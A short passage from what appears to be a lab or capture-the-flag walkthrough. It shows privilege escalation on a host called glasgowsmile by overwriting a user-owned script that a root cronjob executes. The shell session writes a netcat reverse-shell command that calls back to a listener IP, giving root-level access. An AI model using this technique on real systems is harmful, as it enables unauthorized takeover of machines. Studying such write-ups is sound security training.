Overwriting Root Cronjob
The identified root cronjob process on the glasgowsmile
host is executing a Bash script owned by the current user; penguin
. Privilege escalation via overwriting the Bash script is achievable.
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ echo -e '#!/bin/sh\nnc 192.168.45.182 1234 -c bash' > /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
#!/bin/sh
nc 192.168.45.182 1234 -c bash
Overwriting the /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
file with a reverse shell command.
System level compromise